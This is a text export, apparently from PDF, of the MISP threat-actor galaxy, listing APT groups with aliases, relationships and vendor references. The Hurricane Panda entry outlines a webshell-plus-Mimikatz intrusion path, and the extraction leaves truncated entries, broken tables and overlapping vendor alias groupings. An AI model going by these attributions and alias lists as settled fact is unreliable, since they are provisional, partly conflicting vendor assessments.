IXESHE is also known as:
• Numbered Panda
• TG-2754
• BeeBus
• Group 22
• DynCalc
• Calc Team
• DNSCalc
• Crimson Iron
• APT12
• APT 12
• BRONZE GLOBE

IXESHE has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="APT12 - G0005" with estimative-language:likelihood-probability="likely"

Table 5912. Table References

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<tbody>
<tr>
<td><a href="http://www.crowdstrike.com/blog/whois-numbered-panda/">http://www.crowdstrike.com/blog/whois-numbered-panda/</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/apt-12">https://www.cfr.org/interactive/cyber-operations/apt-12</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-globe">https://www.secureworks.com/research/threat-profiles/bronze-globe</a></td>
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APT 16

Between November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear-phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO, or a backdoor that we refer to as ELMER.

The tag is: misp-galaxy:threat-actor="APT 16"

APT 16 is also known as:

• APT16
• SVCMONDR

Table 5913. Table References
**Aurora Panda**

FireEye described APT17 in a 2015 report as: ‘APT17, also known as DeputyDog, is a China based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.’

The tag is: `misp-galaxy:threat-actor="Aurora Panda"`

Aurora Panda is also known as:

- APT 17
- Deputy Dog
- Group 8
- APT17
- Hidden Lynx
- Tailgater Team
- Dogfish
- BRONZE KEYSTONE

Aurora Panda has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="APT17 - G0025"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="Axiom"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:mitre-intrusion-set="Winnti Group - G0044"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:mitre-intrusion-set="Axiom - G0001"` with `estimative-language:likelihood-probability="likely"`

Table 5914. Table References

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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/apt-17">https://www.cfr.org/interactive/cyber-operations/apt-17</a></td>
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<tr>
<td><a href="https://www.carbonblack.com/2013/02/08/bit9-and-our-customers-security/">https://www.carbonblack.com/2013/02/08/bit9-and-our-customers-security/</a></td>
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</table>
Wekby

Wekby was described by Palo Alto Networks in a 2015 report as: 'Wekby is a group that has been active for a number of years, targeting various industries such as healthcare, telecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeams Flash zero-day exploit.'

The tag is: *misp-galaxy:threat-actor*="Wekby"

Wekby is also known as:

- Dynamite Panda
- TG-0416
- APT 18
- SCANDIUM
- PLA Navy
- APT18

Wekby has relationships with:

- similar: *misp-galaxy:mitre-intrusion-set*="APT18 - G0026" with *estimative-language:likelihood-probability*="likely"
- similar: *misp-galaxy:threat-actor*="Samurai Panda" with *estimative-language:likelihood-probability*="likely"

_Table 5915. Table References_

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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/apt-18">https://www.cfr.org/interactive/cyber-operations/apt-18</a></td>
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</table>

**Axiom**

The Winnti grouping of activity is large and may actually be a number of linked groups rather than a single discrete entity. Kaspersky describe Winnti as: 'The Winnti group has been attacking
companies in the online video game industry since 2009 and is currently still active. The group's objectives are stealing digital certificates signed by legitimate software vendors in addition to intellectual property theft, including the source code of online game projects. The majority of the victims are from South East Asia.

The tag is: `misp-galaxy:threat-actor="Axiom"`

Axiom is also known as:

- Winnti Umbrella
- Winnti Group
- Suckfly
- APT41
- APT 41
- Group72
- Group 72
- Blackfly
- LEAD
- WICKED SPIDER
- WICKED PANDA
- BARIUM
- BRONZE ATLAS
- BRONZE EXPORT
- Red Kelpie

Axiom has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Winnti Group - G0044"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-intrusion-set="APT17 - G0025"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Aurora Panda"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-intrusion-set="Axiom - G0001"` with estimative-language:likelihood-probability="likely"

*Table 5916. Table References*

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<td><a href="https://securelist.com/winnti-faq-more-than-just-a-game/57585/">https://securelist.com/winnti-faq-more-than-just-a-game/57585/</a></td>
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<tr>
<td><a href="https://securelist.com/winnti-more-than-just-a-game/37029/">https://securelist.com/winnti-more-than-just-a-game/37029/</a></td>
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<td><a href="http://williamshowalter.com/a-universal-windows-bootkit/">http://williamshowalter.com/a-universal-windows-bootkit/</a></td>
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</table>
Shell Crew

Adversary group targeting financial, technology, non-profit organisations.

The tag is: misp-galaxy:threat-actor="Shell Crew"

Shell Crew is also known as:

- Deep Panda
- WebMasters
- APT 19
- KungFu Kittens
- Black Vine
- Group 13
- PinkPanther
- Sh3llCr3w
• BRONZE FIRESTONE

Shell Crew has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="Deep Panda - G0009" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Hurricane Panda" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Codoso" with estimative-language:likelihood-probability="likely"

Table S917. Table References

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<td><a href="https://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/">https://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/</a></td>
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<td><a href="https://krebsonsecurity.com/2015/06/catching-up-on-the-opm-breach/">https://krebsonsecurity.com/2015/06/catching-up-on-the-opm-breach/</a></td>
</tr>
<tr>
<td><a href="https://krebsonsecurity.com/2015/02/anthem-breach-may-have-started-in-april-2014/">https://krebsonsecurity.com/2015/02/anthem-breach-may-have-started-in-april-2014/</a></td>
</tr>
<tr>
<td><a href="https://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/">https://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/</a></td>
</tr>
<tr>
<td><a href="https://krebsonsecurity.com/2015/05/carefirst-blue-cross-breach-hits-1-1m/">https://krebsonsecurity.com/2015/05/carefirst-blue-cross-breach-hits-1-1m/</a></td>
</tr>
</tbody>
</table>
Naikon

Kaspersky described Naikon in a 2015 report as: 'The Naikon group is mostly active in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, and Nepal, hitting a variety of targets in a very opportunistic way.'

The tag is: misp-galaxy:threat-actor="Naikon"

Naikon is also known as:

- PLA Unit 78020
- APT 30
- APT30
- Override Panda
- Camerashy
- APT.Naikon
- Lotus Panda
- Hellsing
- BRONZE GENEVA

Naikon has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Naikon - G0019" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Lotus Panda" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="APT 30" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-intrusion-set="APT30 - G0013" with estimative-language:likelihood-probability="likely"

Table 5918. Table References

Links

https://securelist.com/analysis/publications/69953/the-naikon-apt/
Lotus Blossom

Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia.

The tag is: `misp-galaxy:threat-actor="Lotus Blossom"`

Lotus Blossom is also known as:

- Spring Dragon
- ST Group
- Esile
- DRAGONFISH
- BRONZE ELGIN

Lotus Blossom has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Lotus Blossom - G0030"` with estimative-language:likelihood-probability="likely"

Table 5919. Table References

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<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://securelist.com/blog/research/70726/the-spring-dragon-apt/">https://securelist.com/blog/research/70726/the-spring-dragon-apt/</a></td>
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<tr>
<td><a href="https://securelist.com/spring-dragon-updated-activity/79067/">https://securelist.com/spring-dragon-updated-activity/79067/</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/lotus-blossom">https://www.cfr.org/interactive/cyber-operations/lotus-blossom</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/operation-lotus-blossom/">https://unit42.paloaltonetworks.com/operation-lotus-blossom/</a></td>
</tr>
</tbody>
</table>

3478
Lotus Panda

The tag is: `misp-galaxy:threat-actor="Lotus Panda"`

Lotus Panda is also known as:

- Elise

Lotus Panda has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Naikon - G0019"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="Naikon"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="APT 30"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:mitre-intrusion-set="APT30 - G0013"` with `estimative-language:likelihood-probability="likely"

Table 5920. Table References

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Hurricane Panda

We have investigated their intrusions since 2013 and have been battling them nonstop over the last year at several large telecommunications and technology companies. The determination of this China-based adversary is truly impressive: they are like a dog with a bone. HURRICANE PANDA's preferred initial vector of compromise and persistence is a China Chopper webshell – a tiny and easily obfuscated 70 byte text file that consists of an ‘eval()’ command, which is then used to provide full command execution and file upload/download capabilities to the attackers. This script is typically uploaded to a web server via a SQL injection or WebDAV vulnerability, which is often trivial to uncover in a company with a large external web presence. Once inside, the adversary immediately moves on to execution of a credential theft tool such as Mimikatz (repacked to avoid AV detection). If they are lucky to have caught an administrator who might be logged into that web...
server at the time, they will have gained domain administrator credentials and can now roam your
network at will via ‘net use’ and ‘wmic’ commands executed through the webshell terminal.

The tag is: *misp-galaxy:threat-actor="Hurricane Panda"

Hurricane Panda is also known as:

- Black Vine
- TEMP.Avengers

Hurricane Panda has relationships with:

- similar: *misp-galaxy:mitre-intrusion-set="Deep Panda - G0009"* with estimative-
  language:likelihood-probability="likely"
- similar: *misp-galaxy:threat-actor="Shell Crew"* with estimative-language:likelihood-
  probability="likely"
- similar: *misp-galaxy:threat-actor="Codoso"* with estimative-language:likelihood-
  probability="likely"

*Table 5921. Table References

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<tr>
<td><a href="https://www.crowdstrike.com/blog/storm-chasing/">https://www.crowdstrike.com/blog/storm-chasing/</a></td>
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</tbody>
</table>

**EMISSARY PANDA**

A China-based actor that targets foreign embassies to collect data on government, defence, and
technology sectors.

The tag is: *misp-galaxy:threat-actor="EMISSARY PANDA"

EMISSARY PANDA is also known as:

- TG-3390
- APT 27
- APT27
- TEMP.Hippo
- Red Phoenix
- Budworm
EMISSARY PANDA has relationships with:


Table 5922. Table References

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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/iron-tiger">https://www.cfr.org/interactive/cyber-operations/iron-tiger</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/bronze-union">https://www.secureworks.com/research/bronze-union</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage">https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage</a></td>
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<tr>
<td><a href="https://securelist.com/luckymouse-ndisproxy-driver/87914/">https://securelist.com/luckymouse-ndisproxy-driver/87914/</a></td>
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<td><a href="https://attack.mitre.org/groups/G0027/">https://attack.mitre.org/groups/G0027/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-union">https://www.secureworks.com/research/threat-profiles/bronze-union</a></td>
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</table>

**Stone Panda**

The tag is: `misp-galaxy:threat-actor="Stone Panda"`
Stone Panda is also known as:

- APT10
- APT 10
- MenuPass
- Menupass Team
- menuPass
- menuPass Team
- happyyongzi
- POTASSIUM
- DustStorm
- Red Apollo
- CVNX
- HOGFISH
- Cloud Hopper
- BRONZE RIVERSIDE

Stone Panda has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="menuPass - G0045" with estimative-language:likelihood-probability="likely"

*Table 5923. Table References*

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<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/">https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/</a></td>
</tr>
<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/apt-10">https://www.cfr.org/interactive/cyber-operations/apt-10</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html</a></td>
</tr>
</tbody>
</table>
Nightshade Panda

The tag is: misp-galaxy:threat-actor="Nightshade Panda"

Nightshade Panda is also known as:

- APT 9
- Flowerlady/Flowershow
- Flowerlady
- Flowershow

Table 5924. Table References

Links

https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393/

Hellsing

This threat actor uses spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the United States. It also seems to have targeted the APT 30. Possibly uses the same infrastructure as Mirage

The tag is: misp-galaxy:threat-actor="Hellsing"

Hellsing is also known as:

- Goblin Panda
- Conimes
- Cycldek

Table 5925. Table References

Links


https://www.cfr.org/interactive/cyber-operations/hellsing

Night Dragon

The tag is: `misp-galaxy:threat-actor="Night Dragon"`

Night Dragon has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Night Dragon - G0014"` with estimative-language:likelihood-probability="likely"

Table 5926. Table References

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<td><a href="https://kc.mcafee.com/corporate/index?page=content&amp;id=KB71150">https://kc.mcafee.com/corporate/index?page=content&amp;id=KB71150</a></td>
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<tr>
<td><a href="https://attack.mitre.org/groups/G0014/">https://attack.mitre.org/groups/G0014/</a></td>
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Mirage

This threat actor uses phishing techniques to compromise the networks of foreign ministries of European countries for espionage purposes.

The tag is: `misp-galaxy:threat-actor="Mirage"`

Mirage is also known as:

- Vixen Panda
- Ke3Chang
- GREF
- Playful Dragon
- APT 15
- APT15
- Metushy
- Lurid
- Social Network Team
- Royal APT
- BRONZE PALACE

Table 5927. Table References

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Anchor Panda

PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy. In addition to maritime operations in this region, Anchor Panda also heavily targeted western companies in the US, Germany, Sweden, the UK, and Australia, and other countries involved in maritime satellite systems, aerospace companies, and defense contractors. Not surprisingly, embassies and diplomatic missions in the region, foreign intelligence services, and foreign governments with space programs were also targeted.

The tag is: misp-galaxy:threat-actor="Anchor Panda"

Anchor Panda is also known as:

• APT14  
• APT 14  
• QAZTeam  
• ALUMINUM

Anchor Panda has relationships with:

• uses: misp-galaxy:rat="Gh0st RAT" with estimative-language:likelihood-probability="likely"  
• uses: misp-galaxy:tool="Gh0st Rat" with estimative-language:likelihood-probability="likely"  
• uses: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"  
• uses: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"  
• uses: misp-galaxy:tool="Torn RAT" with estimative-language:likelihood-probability="likely"
NetTraveler

The tag is: \textit{misp-galaxy:threat-actor}="NetTraveler"

NetTraveler is also known as:

- APT 21
- APT21
- TravNet

Ice Fog

Operate since at least 2011, from several locations in China, with members in Korea and Japan as well. Possibly linked to Onion Dog. This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in Japan and South Korea.

The tag is: \textit{misp-galaxy:threat-actor}="Ice Fog"

Ice Fog is also known as:

- IceFog
- Dagger Panda
• Trident

Table 5930. Table References

Links

https://securelist.com/the-icefog-apt-hits-us-targets-with-java-backdoor/58209/
https://www.cfr.org/interactive/cyber-operations/icefog

Pitty Panda

The Pitty Tiger group has been active since at least 2011. They have been seen using HeartBleed vulnerability in order to directly get valid credentials

The tag is: misp-galaxy:threat-actor="Pitty Panda"

Pitty Panda is also known as:

• PittyTiger
• MANGANESE

Pitty Panda has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="PittyTiger - G0011" with estimative-language:likelihood-probability="likely"

Table 5931. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/
https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html
https://attack.mitre.org/groups/G0011/

Roaming Tiger

The tag is: misp-galaxy:threat-actor="Roaming Tiger"

Roaming Tiger is also known as:

• BRONZE WOODLAND
Beijing Group

The tag is: `misp-galaxy:threat-actor="Beijing Group"`

Beijing Group is also known as:

- Sneaky Panda
- Elderwood
- Elderwood Gang
- SIG22

Beijing Group has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Elderwood - G0066"` with `estimative-language:likelihood-probability="likely"`

Radio Panda

The tag is: `misp-galaxy:threat-actor="Radio Panda"`

Radio Panda is also known as:

- Shrouded Crossbow

APT.3102

The tag is: `misp-galaxy:threat-actor="APT.3102"`
Samurai Panda

The tag is: `misp-galaxy:threat-actor="Samurai Panda"`

Samurai Panda is also known as:

- PLA Navy
- Wisp Team

Samurai Panda has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="APT18 - G0026"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Wekby"` with estimative-language:likelihood-probability="likely"

Impersonating Panda

The tag is: `misp-galaxy:threat-actor="Impersonating Panda"`

Violin Panda

We've uncovered some new data and likely attribution regarding a series of APT watering hole attacks this past summer. Watering hole attacks are an increasingly popular component of APT campaigns, as many people are more aware of spear phishing and are less likely to open documents or click on links in unsolicited emails. Watering hole attacks offer a much better chance of success because they involve compromising legitimate websites and installing malware intended to compromise website visitors. These are often popular websites frequented by people who work in specific industries or have political sympathies to which the actors want to gain access. In contrast to many other APT campaigns, which tend to rely heavily on spear phishing to gain victims, “th3bug” is known for compromising legitimate websites their intended visitors are likely to frequent. Over the summer they compromised several sites, including a well-known Uyghur website written in that native language.

The tag is: `misp-galaxy:threat-actor="Violin Panda"`

Violin Panda is also known as:
• APT20
• APT 20
• TH3Bug
• Twivy

Table 5936. Table References

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**Toxic Panda**

A group targeting dissident groups in China and at the boundaries.

The tag is: *misp-galaxy:threat-actor="Toxic Panda"*

Table 5937. Table References

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**Temper Panda**

China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. This threat actor targets prodemocratic activists and organizations in Hong Kong, European and international financial institutions, and a U.S.-based think tank.

The tag is: *misp-galaxy:threat-actor="Temper Panda"*

Temper Panda is also known as:

• Admin338
• Team338
• MAGNESIUM
• admin@338

Temper Panda has relationships with:
Pirate Panda

TrendMicro described Tropic Trooper in a 2015 report as: 'Taiwan and the Philippines have become the targets of an ongoing campaign called Operation TropicTrooper. Active since 2012, the attackers behind the campaign have set their sights on the Taiwanese government as well as a number of companies in the heavy industry. The same campaign has also targeted key Philippine military agencies.'

The tag is: *misp-galaxy:threat-actor="Pirate Panda"

Pirate Panda is also known as:

- APT23
- APT 23
- KeyBoy
- TropicTrooper
- Tropic Trooper
- BRONZE HOBART

Table 5939. Table References

Links

https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/
Flying Kitten

Activity: defense and aerospace sectors, also interested in targeting entities in the oil/gas industry.

The tag is: misp-galaxy:threat-actor="Flying Kitten"

Flying Kitten is also known as:

- SaffronRose
- Saffron Rose
- AjaxSecurityTeam
- Ajax Security Team
- Group 26
- Sayad

Flying Kitten has relationships with:

- similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="very-likely"
- similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

Table 5940. Table References

Links

3492
Cutting Kitten

While tracking a suspected Iran-based threat group known as Threat Group-2889[1] (TG-2889), Dell SecureWorks Counter Threat Unit™ (CTU) researchers uncovered a network of fake LinkedIn profiles. These convincing profiles form a self-referenced network of seemingly established LinkedIn users. CTU researchers assess with high confidence the purpose of this network is to target potential victims through social engineering. Most of the legitimate LinkedIn accounts associated with the fake accounts belong to individuals in the Middle East, and CTU researchers assess with medium confidence that these individuals are likely targets of TG-2889. One of the threat actors responsible for the denial of service attacks against U.S in 2012–2013. Three individuals associated with the group—believed to be have been working on behalf of Iran’s Islamic Revolutionary Guard Corps—were indicted by the Justice Department in 2016.

The tag is: `misp-galaxy:threat-actor="Cutting Kitten"

Cutting Kitten is also known as:

- ITSecTeam
- Threat Group 2889
- TG-2889
- Ghambar

Cutting Kitten has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Cleaver - G0003"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Cleaver"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="OilRig"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Clever Kitten"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="CHRYSENE"` with `estimative-language:likelihood-probability="likely"

*Table 5941. Table References*
Charming Kitten

Charming Kitten (aka Parastoo, aka Newscaster) is an group with a suspected nexus to Iran that targets organizations involved in government, defense technology, military, and diplomacy sectors.

The tag is: `misp-galaxy:threat-actor="Charming Kitten"`

Charming Kitten is also known as:

- Newscaster
- Parastoo
- iKittens
- Group 83
- Newsbeef
- NewsBeef

Charming Kitten has relationships with:

- similar: `misp-galaxy:threat-actor="Flying Kitten"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Rocket Kitten"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Cleaver"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="OilRig"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Clever Kitten"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="CHRYSENE"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-intrusion-set="Cleaver - G0003"` with estimative-language:likelihood-probability="likely"

Table 5942. Table References

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Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

The tag is: misp-galaxy:threat-actor="APT33"

APT33 is also known as:

- APT 33
- Elfin
- MAGNALLIUM
- Refined Kitten
• HOLMIUM
• COBALT TRINITY

APT33 has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="APT33 - G0064" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="MAGNALLIUM" with estimative-language:likelihood-probability="likely"

Table 5943. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/
https://www.brighttalk.com/webcast/10703/275683
https://www.secureworks.com/research/threat-profiles/cobalt-trinity
https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/

Magic Kitten

Earliest activity back to November 2008. An established group of cyber attackers based in Iran, who carried on several campaigns in 2013, including a series of attacks targeting political dissidents and those supporting Iranian political opposition.

The tag is: misp-galaxy:threat-actor="Magic Kitten"

Magic Kitten is also known as:

• Group 42
• VOYEUR

Table 5944. Table References

Links

Rocket Kitten

Targets Saudi Arabia, Israel, US, Iran, high ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences.

The tag is: misp-galaxy:threat-actor="Rocket Kitten"

Rocket Kitten is also known as:

- TEMP.Beanie
- Operation Woolen Goldfish
- Operation Woolen-Goldfish
- Thamar Reservoir
- Timberworm

Rocket Kitten has relationships with:

- similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="very-likely"
- similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

Table 5945. Table References

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<tr>
<td><a href="http://www.clearskysec.com/thamar-reservoir/">http://www.clearskysec.com/thamar-reservoir/</a></td>
</tr>
</tbody>
</table>
Cleaver

A group of cyber actors utilizing infrastructure located in Iran have been conducting computer network exploitation activity against public and private U.S. organizations, including Cleared Defense Contractors (CDCs), academic institutions, and energy sector companies. This threat actor targets entities in the government, energy, and technology sectors that are located in or do business with Saudi Arabia.

The tag is: *misp-galaxy:threat-actor*="Cleaver"

Cleaver is also known as:

- Operation Cleaver
- Tarh Andishan
- Alibaba
- 2889
- TG-2889
- Cobalt Gypsy
- Rocket_Kitten
- Cutting Kitten
- Group 41
- Magic Hound
- APT35
- APT 35
- TEMP.Beanie
- Ghambar

Cleaver has relationships with:

- similar: *misp-galaxy:mitre-intrusion-set*="Cleaver - G0003" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

*Table 5946. Table References*

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<td><a href="https://www.secureworks.com/research/the-curious-case-of-mia-ash">https://www.secureworks.com/research/the-curious-case-of-mia-ash</a></td>
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<td><a href="https://attack.mitre.org/groups/G0003/">https://attack.mitre.org/groups/G0003/</a></td>
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</table>
Sands Casino

The tag is: `misp-galaxy:threat-actor="Sands Casino"`

Rebel Jackal

This is a pro-Islamist organization that generally conducts attacks motivated by real world events in which its members believe that members of the Muslim faith were wronged. Its attacks generally involve website defacements; however, the group did develop a RAT that it refers to as Fallaga RAT, but which appears to simply be a fork of the njRAT malware popular amongst hackers in the Middle East/North Africa region.

The tag is: `misp-galaxy:threat-actor="Rebel Jackal"`

Rebel Jackal is also known as:

- FallagaTeam

Viking Jackal

The tag is: `misp-galaxy:threat-actor="Viking Jackal"`

Viking Jackal is also known as:

- Vikingdom

Sofacy

The Sofacy Group (also known as APT28, Pawn Storm, Fancy Bear and Sednit) is a cyber espionage group believed to have ties to the Russian government. Likely operating since 2007, the group is known to target government, military, and security organizations. It has been characterized as an advanced persistent threat.

The tag is: `misp-galaxy:threat-actor="Sofacy"`

Sofacy is also known as:

- APT 28
- APT28
- Pawn Storm
- PawnStorm
- Fancy Bear
- Sednit
- SNAKEMACKEREL
- TsarTeam
Sofacy has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:microsoft-activity-group="STRONTIUM" with estimative-language:likelihood-probability="likely"

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<td><a href="https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-eff">https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-eff</a></td>
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<tr>
<td><strong>APT 29</strong></td>
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<td>A 2015 report by F-Secure describe APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States;Asian, African, and Middle Eastern governments;organizations associated with Chechen extremism;and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash-and-grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible. If the compromised target is</td>
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APT 29

